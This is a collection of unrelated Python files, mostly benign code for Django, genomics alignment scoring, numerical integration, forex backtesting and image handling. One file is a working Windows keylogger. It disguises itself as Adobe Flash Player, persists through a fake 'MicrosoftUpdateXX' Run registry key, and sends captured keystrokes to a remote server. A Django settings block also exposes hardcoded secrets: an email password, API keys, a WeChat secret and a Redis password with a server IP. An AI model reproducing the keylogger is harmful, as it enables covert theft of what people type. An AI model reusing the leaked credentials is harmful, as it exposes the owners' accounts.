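def _demo_worker(index: int) -> Tuple[Pronunciation, int]:
    word = _demo_payload[index]
    return word, len(word)

if __name__ == "__main__":
    demo_words = OrderedSet([("a",), ("b", "c"), ("d", "e", "f")])
    with Pool(processes=2, initializer=_demo_init, initargs=(demo_words,)) as demo_pool:
        print(dict(demo_pool.imap_unordered(_demo_worker, range(len(demo_words)))))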
|
# NOTE: All sets default for development
DJANGO_ENV = "development"
PG_DEFAULT_DB_NAME = "jc_developer"
PG_DEFAULT_DB_HOST = "localhost"
PG_DEFAULT_DB_PORT = "5432"
PG_DEFAULT_DB_USER = "jc_developer"
PG_DEFAULT_DB_PASS = "jc_developer"
MONGO_DEFAULT_DB_NAME = "suandao"
MONGO_DEFAULT_DB_PORT = 27017
MONGO_DEFAULT_DB_HOST = "localhost"
MONGO_DEFAULT_DB_USER = ""
MONGO_DEFAULT_DB_PASS = ""
REDIS_LOCATION = "redis://127.0.0.1:6379/0"
# REDIS_LOCATION = "redis://:itcm1234*(@101.132.151.156:6379/0"
SERVER_EMAIL_ADDR = "test1@jclife.com"
SERVER_EMAIL_PASS = "Mm041208"
YUNPIAN_API_KEY = "e92698548178322ab51f3aa36ebc4133"
WECHAT_APPID = "wx4707b35ca031c5b1"
WECHAT_SECRET = "b5a42ce5eeb6ed459de76ea152e8dfb2"
CELERY_BROKER_URL = "redis://127.0.0.1:6379/8"
# CELERY_BROKER_URL = "redis://:itcm1234*(@101.132.151.156:6379/8"
CELERY_RESULT_BACKEND = "redis://127.0.0.1:6379/7"
# CELERY_RESULT_BACKEND = "redis://:itcm1234*(@101.132.151.156:6379/7"
|
from integraisGaussLegendre import iterar
import math
a = 0
b = 5
e = 10**-6
f1 = lambda x: (math.log(2*x) * math.cos(4*x))
# f1 = lambda x: (2*x)**3 # Answer: 2
# f2 = lambda x: math.cos(4*x) # Answer: -0.1892006
# f3 = lambda x: (math.sin(2*x) + 4*(x**2) + 3*x)**2 # Answer: 17.8764703
# f4 = lambda x: (x + (3*x)**2 - math.cos(4*x**1.5) + math.e**(x/3)) # Answer: 4.62323
f = [f1]
for i in range(len(f)):
print("Cálculo da integral da função f", i + 1, " com erro de ", e, ":", sep='')
for j in range(2, 5):
I, div = iterar(f[i], a, b, e, j)
print(" ", j, " pontos com ", div, " divisões: ", round(I, 7), sep="")
print()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-18 10:03
from __future__ import unicode_literals
import shoptools.abstractions.models
import shoptools.util
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='SavedCart',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(default=datetime.datetime.now)),
('secret', models.UUIDField(db_index=True, default=shoptools.util.make_uuid, editable=False)),
('_shipping_options', models.TextField(blank=True, db_column='shipping_options', default='', editable=False, verbose_name='shipping options')),
('_voucher_codes', models.TextField(blank=True, db_column='voucher_codes', default='', editable=False, verbose_name='voucher codes')),
('order_obj_id', models.PositiveIntegerField(null=True)),
('currency', models.CharField(default='NZD', editable=False, max_length=3)),
('order_obj_content_type', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
bases=(models.Model, shoptools.abstractions.models.ICart),
),
migrations.CreateModel(
name='SavedCartLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_object_id', models.PositiveIntegerField()),
('created', models.DateTimeField(default=datetime.datetime.now)),
('quantity', models.IntegerField()),
('item_content_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType')),
('parent_object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cart.SavedCart')),
],
options={
'abstract': False,
},
bases=(models.Model, shoptools.abstractions.models.ICartLine),
),
migrations.AlterUniqueTogether(
name='savedcartline',
unique_together=set([('item_content_type', 'item_object_id', 'parent_object')]),
),
]
|
import math
N, K = map(int, input().split())
girls, boys = [], []
while N:
S, Y = map(int, input().split())
if S == 0:
girls.append(Y)
else:
boys.append(Y)
N -= 1
count = 0
girls = sorted(girls)
boys = sorted(boys)
for i in range(6):
count += math.ceil(girls.count(i+1)/K)
count += math.ceil(boys.count(i+1)/K)
print(count)
|
import pythoncom
import pyHook
from os import path
from time import sleep
from threading import Thread
import urllib, urllib2
import datetime
import win32com.client
import win32event, win32api, winerror
from _winreg import *
import shutil
import sys
import base64
import requests
ironm = win32event.CreateMutex(None, 1, 'NOSIGN')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
ironm = None
print "nope"
sys.exit()
x, data, count= '', '', 0
dir = r"C:\Users\Public\Libraries\adobeflashplayer.exe"
lastWindow = ''
def startup():
shutil.copy(sys.argv[0], dir)
aReg = ConnectRegistry(None, HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosoftUpdateXX", 0, REG_SZ, dir)
if not path.isfile(dir):
startup()
def send_http_post():
global data
while True:
if len(data) > 30:
try:
timeInSecs = datetime.datetime.now()
#SERVER_URL = The server URL to post to
#POST_DATA = The post data to include.
# Use $KeyStream$ for the area of the keystream
# Use $Date$ for the sending date
#BASE64_ENC - if to encode as base64
keysData = data
if BASE64_ENC == 'y':
keysData = base64.encodestring(keysData)
postData = POST_DATA
postData = postData.replace('$KeyStream$', keysData)
postData = postData.replace('$Date$', str(timeInSecs) )
requests.post(SERVER_URL, data=postData)
except Exception as error:
print error
sleep(120)
def pushing(event):
global data, lastWindow
window = event.WindowName
keys = {
13: ' [ENTER] ',
8: ' [BACKSPACE] ',
162: ' [CTRL] ',
163: ' [CTRL] ',
164: ' [ALT] ',
165: ' [ALT] ',
160: ' [SHIFT] ',
161: ' [SHIFT] ',
46: ' [DELETE] ',
32: ' [SPACE] ',
27: ' [ESC] ',
9: ' [TAB] ',
20: ' [CAPSLOCK] ',
38: ' [UP] ',
40: ' [DOWN] ',
37: ' [LEFT] ',
39: ' [RIGHT] ',
91: ' [SUPER] '
}
keyboardKeyName = keys.get(event.Ascii, chr(event.Ascii))
if window != lastWindow:
lastWindow = window
data += ' { ' + lastWindow + ' } '
data += keyboardKeyName
else:
data += keyboardKeyName
if __name__ == '__main__':
triggerThread = Thread(target=send_http_post)
triggerThread.start()
hookManager = pyHook.HookManager()
hookManager.KeyDown = pushing
hookManager.HookKeyboard()
pythoncom.PumpMessages()
|
from enum import Enum
class Action(Enum):
"""Class for enumerations of agent actions."""
UP = (-1, 0)
DOWN = (1, 0)
LEFT = (0, -1)
RIGHT = (0, 1)
|
from math import inf
from typing import Dict, List, Tuple, Optional
from .calculate_score import (
calculate_score,
calculate_complexity_adjusted_score,
)
from .matrices import AlignMatrix
from .performance import timeit
@timeit()
def fill_align_matrix(
lambda_values: List[float],
column_count: int,
edge_start: int,
chunk_size: int,
gap_inits: List[float],
gap_exts: List[float],
skip_align_score: float,
subfams: List[str],
chroms: List[str],
starts: List[int],
stops: List[int],
sub_matrices: List[Dict[str, int]],
background_freqs: List[Optional[Dict[str, float]]],
) -> AlignMatrix:
"""
Fills an alignment score matrix by calculating an alignment score (according
to crossmatch scoring) for every segment of size `chunk_size` for all
sequences.
Scores are based on the surrounding `chunk_size` nucleotides in the
alignment. Ex: column 15 in the matrix holds the alignment score for
nucleotides at positions 0 - 30, assuming `chunk_size` = 31.
Starting and trailing cells are treated differently. For example, column 0
in the matrix holds the alignment score for nucleotides 0 - 15, column 1
represents nucleotides 0 - 16, etc. Scores are weighted based on number of
nucleotides that contribute to the score.
This algorithm ignores all padded indices (".") in the chroms and subfams
lists.
Speed up: compute the base score for the first segment, then move to the next
column by adding the next char's score to the base score and subtracting the
previous char's score from it. Restarts and recomputes a new base score when
necessary.
Inputs:
everything needed for CalcScore()
edge_start: where alignment starts on the target/chrom sequence
chunk_size: size of nucleotide chunks that are scored
skip_align_score: alignment score to give the skip state (default = 0)
subfams: alignments to calculate scores from
chroms: alignments to calculate scores from
starts: where in the target sequence the competing alignments start
Outputs:
align_matrix: Hash implementation of sparse 2D matrix used in pre-DP calculations.
Key is tuple[int, int] that maps row, col to the value held in that cell of matrix. Rows
are subfamilies in the input alignment file, cols are nucleotide positions in the target sequence.
>>> chros = ["", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT...............", "TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT..............."]
>>> subs = ["", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...............", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA--A..............."]
>>> strts = [0, 2, 0]
>>> stps = [0, 39, 39]
>>> sub_mat = [{"AA":1, "AT":-1, "TA":-1, "TT":1, "..":0}] * 3
>>> back_freqs = [None] * 3
>>> m = fill_align_matrix([0.0, 0.1, 0.1], 41, 0, 31, [0, -25, -25], [0, -5, -5], 1.0, subs, chros, strts, stps, sub_mat, back_freqs)
>>> m
{(1, 3): 3.1, (1, 4): 3.1, (1, 5): 3.1, (1, 6): 3.1, (1, 7): 3.1, (1, 8): 3.1, (1, 9): 3.1, (1, 10): 3.1, (1, 11): 3.1, (1, 12): 3.1, (1, 13): 3.1, (1, 14): 3.1, (1, 15): 3.1, (1, 16): 3.1, (1, 17): 3.1, (1, 18): 3.1, (1, 19): 3.1, (1, 20): 3.1, (1, 21): 3.1, (1, 22): 3.1, (1, 23): 3.1, (1, 24): 3.1, (1, 25): 2.9000000000000004, (1, 26): 2.8933333333333335, (1, 27): 2.8862068965517245, (1, 28): 2.878571428571429, (1, 29): 2.8703703703703702, (1, 30): 2.861538461538462, (1, 31): 2.8520000000000003, (1, 32): 2.841666666666667, (1, 33): 2.8304347826086955, (1, 34): 2.8181818181818183, (1, 35): 2.804761904761905, (1, 36): 2.7900000000000005, (1, 37): 2.7736842105263158, (1, 38): 2.7555555555555555, (1, 39): 2.735294117647059, (1, 40): 2.7125000000000004, (2, 1): 2.7125000000000004, (2, 2): 2.735294117647059, (2, 3): 2.755555555555556, (2, 4): 2.7736842105263158, (2, 5): 2.79, (2, 6): 2.804761904761905, (2, 7): 2.8181818181818183, (2, 8): 2.830434782608696, (2, 9): 2.841666666666667, (2, 10): 2.8520000000000003, (2, 11): 2.861538461538462, (2, 12): 2.8703703703703702, (2, 13): 2.8785714285714286, (2, 14): 2.8862068965517245, (2, 15): 2.8933333333333335, (2, 16): 2.9000000000000004, (2, 17): 3.1, (2, 18): 3.1, (2, 19): 3.1, (2, 20): 3.1, (2, 21): 3.1, (2, 22): 3.1, (2, 23): 0.5, (2, 24): -0.1, (2, 25): -0.30000000000000004, (2, 26): -0.41333333333333333, (2, 27): -0.5344827586206897, (2, 28): -0.6642857142857143, (2, 29): -0.8037037037037037, (2, 30): -0.9538461538461539, (2, 31): -1.116, (2, 32): -1.291666666666667, (2, 33): -1.482608695652174, (2, 34): -1.6909090909090907, (2, 35): -1.9190476190476191, (2, 36): -2.17, (2, 37): -2.447368421052632, (2, 38): -2.7555555555555555, (2, 39): -3.1, (2, 40): -3.4875000000000003, (0, 0): 1.0, (0, 1): 1.0, (0, 2): 1.0, (0, 3): 1.0, (0, 4): 1.0, (0, 5): 1.0, (0, 6): 1.0, (0, 7): 1.0, (0, 8): 1.0, (0, 9): 1.0, (0, 10): 1.0, (0, 11): 1.0, (0, 12): 1.0, (0, 13): 1.0, (0, 14): 1.0, (0, 15): 1.0, (0, 16): 1.0, (0, 17): 1.0, (0, 18): 1.0, (0, 19): 1.0, (0, 20): 1.0, (0, 21): 1.0, (0, 22): 1.0, (0, 23): 1.0, (0, 24): 1.0, (0, 25): 1.0, (0, 26): 1.0, (0, 27): 1.0, (0, 28): 1.0, (0, 29): 1.0, (0, 30): 1.0, (0, 31): 1.0, (0, 32): 1.0, (0, 33): 1.0, (0, 34): 1.0, (0, 35): 1.0, (0, 36): 1.0, (0, 37): 1.0, (0, 38): 1.0, (0, 39): 1.0, (0, 40): 1.0}
"""
half_chunk: int = int((chunk_size - 1) / 2)
align_matrix: Dict[Tuple[int, int], float] = {}
# chunks can't start on gaps and gaps don't count when getting to the chunk_size nucls
for i in range(1, len(chroms)):
subfam_seq: str = subfams[i]
chrom_seq: str = chroms[i]
sub_matrix = sub_matrices[i]
lamb = lambda_values[i]
gap_init = gap_inits[i]
gap_ext = gap_exts[i]
char_complexity_adjustments = calculate_complexity_adjusted_score(
background_freqs[i], subfam_seq, chrom_seq, lamb
)
# starts at the first non '.' char, but offsets it in the matrix based on where
# the alignments start in the seq - ex: if first alignment in the seq starts at 10,
# will offset by 10
seq_index: int = 0 # place in subfam_seq and chrom_seq
col_index = (
starts[i] - edge_start + half_chunk + 1
) # col in align_matrix
k = half_chunk
temp_index = seq_index
temp_count = 0
while temp_count < chunk_size - k:
# stop offset before padding starts
if chrom_seq[temp_index] == ".":
break
if chrom_seq[temp_index] != "-":
temp_count += 1
temp_index += 1
offset: int = temp_index - seq_index
# normalizes for first non trailing cell
chrom_slice: str = chrom_seq[seq_index : seq_index + offset]
subfam_slice: str = subfam_seq[seq_index : seq_index + offset]
# calculates score for first chunk and puts in align_matrix
align_score: float = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
"",
"",
sub_matrix,
char_complexity_adjustments,
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
# scores for first part, until we get to full sized chunks
for k in range(half_chunk - 1, -1, -1):
if (
chroms[i][seq_index + offset] != "-"
): # if no new gap introduced, move along seq and add next nucl into score
if subfams[i][seq_index + offset] == "-":
if subfams[i][seq_index + offset - 1] == "-":
align_score = align_score + gap_ext
else:
align_score = align_score + gap_init
else:
align_score = (
align_score
+ sub_matrix[
subfams[i][seq_index + offset]
+ chroms[i][seq_index + offset]
]
+ char_complexity_adjustments[
chroms[i][seq_index + offset]
]
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
offset += 1
else: # if new gap introduced, recalculate offset and call CalcScore again
temp_index = seq_index
temp_count = 0
while temp_count < chunk_size - k:
if chrom_seq[temp_index] == ".":
break
if chrom_seq[temp_index] != "-":
temp_count += 1
temp_index += 1
offset = temp_index - seq_index
chrom_slice = chrom_seq[seq_index : seq_index + offset]
subfam_slice = subfam_seq[seq_index : seq_index + offset]
align_score = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
subfams[i][seq_index - 1],
chroms[i][seq_index - 1],
sub_matrix,
char_complexity_adjustments,
)
align_matrix[i, col_index - k] = lamb * (
align_score * chunk_size / (chunk_size - k)
)
col_index += 1
num_nucls: int = chunk_size # how many nucls contributed to align score
# move to next chunk by adding next chars score and subtracting prev chars score
while seq_index + offset < len(chrom_seq):
temp_index = seq_index
temp_count = 0
# stop when you reach the last col to fill in
if col_index > stops[i] - edge_start + 1:
break
# update offset if removing a gap
if chrom_seq[seq_index] == "-":
offset -= 1
# skip over the gap and do not calculate a score for the matrix
if chrom_seq[seq_index + 1] != "-":
# if new gap introduced, or gets rid of old gap, recalc offset, rerun CalcScore
if (
chrom_seq[seq_index + offset] == "-"
or chrom_seq[seq_index] == "-"
):
while temp_count < chunk_size:
if chrom_seq[temp_index + 1] == ".":
break
if chrom_seq[temp_index + 1] != "-":
temp_count += 1
temp_index += 1
offset = temp_index - seq_index
chrom_slice = chrom_seq[
seq_index + 1 : seq_index + offset + 1
]
subfam_slice = subfam_seq[
seq_index + 1 : seq_index + offset + 1
]
align_score = calculate_score(
gap_ext,
gap_init,
subfam_slice,
chrom_slice,
subfam_seq[seq_index],
chrom_seq[seq_index],
sub_matrix,
char_complexity_adjustments,
)
temp_count2: int = 0
for nuc in chrom_slice:
if nuc == ".":
break
if nuc != "-":
temp_count2 += 1
num_nucls = temp_count2
if num_nucls <= half_chunk:
align_score = -inf
else:
# align_score from previous segment - prev chars score + next chars score
# subtracting prev chars score
if subfam_seq[seq_index] == "-":
num_nucls -= 1
if subfam_seq[seq_index - 1] == "-":
align_score = align_score - gap_ext
else:
align_score = align_score - gap_init
else:
align_score = (
align_score
- sub_matrix[
subfam_seq[seq_index] + chrom_seq[seq_index]
]
- char_complexity_adjustments[chrom_seq[seq_index]]
)
num_nucls -= 1
# adding next chars score
if subfam_seq[seq_index + offset - half_chunk] == ".":
break
elif subfam_seq[seq_index + offset] == "-":
num_nucls += 1
if subfam_seq[seq_index + offset - 1] == "-":
align_score = align_score + gap_ext
else:
align_score = align_score + gap_init
elif subfam_seq[seq_index + offset] == ".":
align_score = align_score
else:
align_score = (
align_score
+ sub_matrix[
subfam_seq[seq_index + offset]
+ chrom_seq[seq_index + offset]
]
+ char_complexity_adjustments[
chrom_seq[seq_index + offset]
]
)
num_nucls += 1
align_matrix[i, col_index] = lamb * (
align_score / num_nucls * chunk_size
)
if align_score == -inf:
del align_matrix[i, col_index]
break
col_index += 1
seq_index += 1
# assigns skip states an alignment score
# do not lambda adjust skip state score
for j in range(column_count):
align_matrix[0, j] = skip_align_score
return align_matrix
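# Added sketch (independent of the real crossmatch scoring above) of the
# sliding-window speed-up described in the docstring: keep a running chunk
# score, adding the incoming character's score and subtracting the outgoing
# one instead of re-scoring every chunk from scratch. Toy +1/-1 match scoring,
# no gaps or padding.
def _sliding_chunk_scores_demo(subfam: str, chrom: str, chunk_size: int) -> List[int]:
    def char_score(a: str, b: str) -> int:
        return 1 if a == b else -1

    scores: List[int] = []
    running = sum(char_score(a, b) for a, b in zip(subfam[:chunk_size], chrom[:chunk_size]))
    scores.append(running)
    for start in range(1, len(chrom) - chunk_size + 1):
        running -= char_score(subfam[start - 1], chrom[start - 1])  # outgoing char
        running += char_score(
            subfam[start + chunk_size - 1], chrom[start + chunk_size - 1]
        )  # incoming char
        scores.append(running)
    return scores

assert _sliding_chunk_scores_demo("AAAT", "AAAA", 3) == [3, 1]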
|
from __future__ import print_function, division
import sys
try:
    from osgeo import gdal  # modern GDAL bindings
except ImportError:
    import gdal  # fallback for older installs exposing a top-level module
import png
import numpy as np
import matplotlib.pyplot as pl
def write_png(z, name):
# Use pypng to write z as a color PNG.
with open(name, 'wb') as f:
writer = png.Writer(width=z.shape[1], height=z.shape[0], bitdepth=16)
# Convert z to the Python list of lists expected by
# the png writer.
z2list = z.reshape(-1, z.shape[1] * z.shape[2]).tolist()
writer.write(f, z2list)
pass
def get_combination(example, bands):
example_array = example.GetRasterBand(bands[0]).ReadAsArray()
for i in bands[1:]:
example_array = np.dstack((example_array,
example.GetRasterBand(i).ReadAsArray())).astype(np.int16)
return example_array
def main(this_example):
example = gdal.Open(this_example)
example_array = get_combination(example=example, bands=[4,3,2])
show_image = np.asarray(np.clip(example_array/4096, 0, 1)*255, dtype=np.uint8)
print(show_image.shape)
pl.imshow(show_image)
pl.show()
pass
if __name__ == '__main__':
main(this_example=sys.argv[1])
|
import platform
from wordcloud import WordCloud
import matplotlib as mpl
def add_args(parser):
return parser.parse_args()
def run(db, args):
if platform.system() == "Darwin":
mpl.use("TkAgg")
import matplotlib.pyplot as plt
title = "Top reused passwords for {}".format(args.domain)
passwords = db.all_passwords
wc = WordCloud(background_color="black", width=1280, height=800, margin=5, max_words=1000, color_func=__get_password_color(passwords))
wc.generate(" ".join([password for password, score in passwords]))
plt.title(title)
plt.imshow(wc, interpolation="nearest", aspect="equal")
plt.axis("off")
plt.show()
def __get_password_color(passwords):
colormap = {0: "0, 50%, 50%", 1: "25, 50%, 50%", 2: "55, 80%, 50%", 3: "120, 50%, 50%", 4: "0, 100%, 100%"}
def get_color(word, font_size, position, orientation, random_state=None, **kwargs):
scores = [score for password, score in passwords if password == word]
score = next(iter(scores or []), 0)
return "hsl({})".format(colormap[score])
return get_color
|
from datetime import datetime
import pandas as pd
import fxsignal
import fxcmpy
import yaml
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)-8s %(message)s',
handlers=[logging.FileHandler("./logs/algo.log"), logging.StreamHandler()])
#major_currencies = ['EUR/USD', 'GBP/USD', 'AUD/USD', 'USD/CAD', 'NZD/USD', 'USD/CHF','USD/JPY']
major_currencies = ['EUR/USD', 'GBP/USD', 'USD/CAD', 'USD/JPY']
def simplebuy_breakout30_major(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2018, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'buy', plot=False, verbose=False)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_breakout30_major(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2018, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'sell', plot=False, verbose=False)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplebuy_breakout30(config):
feed = fxsignal.FxcmFeed('USD/CAD', datetime(2019, 8, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'buy', plot=False, verbose=True)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_breakout30(config):
feed = fxsignal.FxcmFeed('EUR/USD', datetime(2019, 8, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'breakout30', 'sell', plot=True, verbose=False)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplebuy_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'trend30', 'buy', plot=True, verbose=False)
runner.run()
logging.info("simplebuy symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def simplesell_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.AlgoRunner(feed, data, 'trend30','sell', plot=True, verbose=True)
runner.run()
logging.info("simplesell symbol: {} {}".format(feed.symbol, runner.feed.symbol))
def optimizebuy_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'trend30', 'buy', leverage=300)
runner.run()
def optimizesell_trend30(config):
feed = fxsignal.FxcmFeed('GBP/USD', datetime(2019, 1, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'trend30', 'sell')
runner.run()
def optimizebuy_breakout30(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2019, 9, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'breakout30', 'buy')
runner.run()
def optimizesell_breakout30(config):
for currency in major_currencies:
feed = fxsignal.FxcmFeed(currency, datetime(2019, 9, 1), datetime(2019, 12, 1), 'm30', config['fxcm'])
feed.read_csv()
data = fxsignal.FeedConverter.fxcm2bt(feed.clean())
runner = fxsignal.OptimizeRunner(feed, data, 'breakout30', 'sell')
runner.run()
def run():
with open('./scripts/config.yaml') as f:
config = yaml.load(f, Loader=yaml.FullLoader)
#simplebuy_breakout30_major(config)
#simplesell_breakout30_major(config)
#simplebuy_breakout30(config)
#simplesell_breakout30(config)
#simplebuy_trend30(config)
#simplesell_trend30(config)
#optimizebuy_trend30(config)
    #optimizesell_trend30(config)
optimizebuy_breakout30(config)
optimizesell_breakout30(config)
if __name__ == '__main__':
run()
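# For reference, a hypothetical scripts/config.yaml layout. Only the 'fxcm' section is
# read above and handed to fxsignal.FxcmFeed; the field names below mirror typical
# fxcmpy connection settings and are an assumption, not part of this repository:
#
#   fxcm:
#     access_token: "<your FXCM REST API token>"
#     server: "demo"
#     log_level: "error"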
|
import os,json
from ehive.runnable.IGFBaseProcess import IGFBaseProcess
from igf_data.utils.tools.bwa_utils import BWA_util
from igf_data.utils.fileutils import get_datestamp_label
from igf_data.utils.tools.reference_genome_utils import Reference_genome_utils
class RunBWA(IGFBaseProcess):
def param_defaults(self):
params_dict = super(RunBWA,self).param_defaults()
params_dict.update({
'reference_type':'GENOME_BWA',
'run_thread':1,
'r2_read_file':None,
'parameter_options':'{"-M":""}',
'use_ephemeral_space':0,
})
return params_dict
def run(self):
'''
A method for running BWA alignment
'''
try:
project_igf_id = self.param_required('project_igf_id')
experiment_igf_id = self.param_required('experiment_igf_id')
sample_igf_id = self.param_required('sample_igf_id')
run_igf_id = self.param_required('run_igf_id')
bwa_exe = self.param_required('bwa_exe')
samtools_exe = self.param_required('samtools_exe')
r1_read_file = self.param_required('r1_read_file')
r2_read_file = self.param('r2_read_file')
run_thread = self.param('run_thread')
output_prefix = self.param_required('output_prefix')
igf_session_class = self.param_required('igf_session_class')
species_name = self.param('species_name')
reference_type = self.param('reference_type')
base_work_dir = self.param_required('base_work_dir')
parameter_options = self.param('parameter_options')
seed_date_stamp = self.param_required('date_stamp')
use_ephemeral_space = self.param('use_ephemeral_space')
seed_date_stamp = get_datestamp_label(seed_date_stamp)
input_fastq_list = list()
input_fastq_list.append(r1_read_file[0])
if r2_read_file is not None and \
len(r2_read_file)>0:
input_fastq_list.append(r2_read_file[0])
work_dir_prefix = \
os.path.join(
base_work_dir,
project_igf_id,
sample_igf_id,
experiment_igf_id,
run_igf_id)
work_dir = \
self.get_job_work_dir(work_dir=work_dir_prefix) # get a run work dir
ref_genome = \
Reference_genome_utils(
genome_tag=species_name,
dbsession_class=igf_session_class,
bwa_ref_type=reference_type) # setup ref genome utils
bwa_ref = ref_genome.get_genome_bwa() # get bwa ref
bwa_obj = \
BWA_util(
bwa_exe=bwa_exe,
samtools_exe=samtools_exe,
ref_genome=bwa_ref,
input_fastq_list=input_fastq_list,
output_dir=work_dir,
output_prefix=output_prefix,
bam_output=True,
use_ephemeral_space=use_ephemeral_space,
thread=run_thread) # set up bwa for run
if isinstance(parameter_options, str):
parameter_options=json.loads(parameter_options) # convert string param to dict
final_output_file,bwa_cmd = \
bwa_obj.\
run_mem(parameter_options=parameter_options) # run bwa mem
self.param('dataflow_params',
{'bwa_bam':final_output_file,
'seed_date_stamp':seed_date_stamp}) # pass on bwa output list
message = \
'finished bwa {0} {1}'.\
format(
project_igf_id,
run_igf_id)
self.post_message_to_slack(message,reaction='pass') # send log to slack
self.comment_asana_task(task_name=project_igf_id, comment=message) # send comment to Asana
self.post_message_to_ms_team(
message=message,
reaction='pass')
message = \
'Bwa {0} {1}'.\
format(
run_igf_id,
bwa_cmd)
self.comment_asana_task(task_name=project_igf_id, comment=message) # send commandline to Asana
except Exception as e:
message = \
'project: {2}, sample:{3}, Error in {0}: {1}'.\
format(
self.__class__.__name__,
e,
project_igf_id,
sample_igf_id)
self.warning(message)
self.post_message_to_slack(message,reaction='fail') # post msg to slack for failed jobs
self.post_message_to_ms_team(
message=message,
reaction='fail')
raise
|
# Copyright 2013-2018 Adam Karpierz
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# <AK> added
#
from __future__ import absolute_import
import jpype
from . import common
class DirectBufferTestCase(common.JPypeTestCase):
DATA_SIZE = 5 * 1024 * 1024 # 5 MB
@classmethod
def setUpClass(cls):
super(DirectBufferTestCase, cls).setUpClass()
cls.ByteBuffer = jpype.JClass("java.nio.ByteBuffer")
def testDirectBuffer(self):
data = b'X' * self.DATA_SIZE
buff = jpype.nio.convertToDirectBuffer(data)
self.assertIsInstance(buff, self.ByteBuffer)
|
# Generated by Django 3.2.11 on 2022-01-25 09:48
import django.core.validators
from django.db import migrations, models
import main.models
class Migration(migrations.Migration):
dependencies = [
("main", "0062_alter_resourcingrequest_is_ir35"),
]
operations = [
migrations.AlterField(
model_name="cestdocument",
name="file",
field=models.FileField(
help_text='Use the <a class="govuk-link" target="_blank" href="https://www.gov.uk/guidance/check-employment-status-for-tax">CEST tool</a> and upload the PDF file output.<br>The link to the document is only valid for 5 minutes. After this, you will need to refresh the page to get a new link.',
upload_to=main.models.resourcing_request_directory_path,
validators=[django.core.validators.FileExtensionValidator(["pdf"])],
),
),
migrations.AlterField(
model_name="interimrequest",
name="contractor_type",
field=models.CharField(
choices=[("generalist", "Generalist"), ("specialist", "Specialist")],
max_length=50,
verbose_name="Type of interim required",
),
),
migrations.AlterField(
model_name="interimrequest",
name="part_b_business_case",
field=models.TextField(
help_text="Explain why an interim resource is needed.",
verbose_name="Business case",
),
),
migrations.AlterField(
model_name="interimrequest",
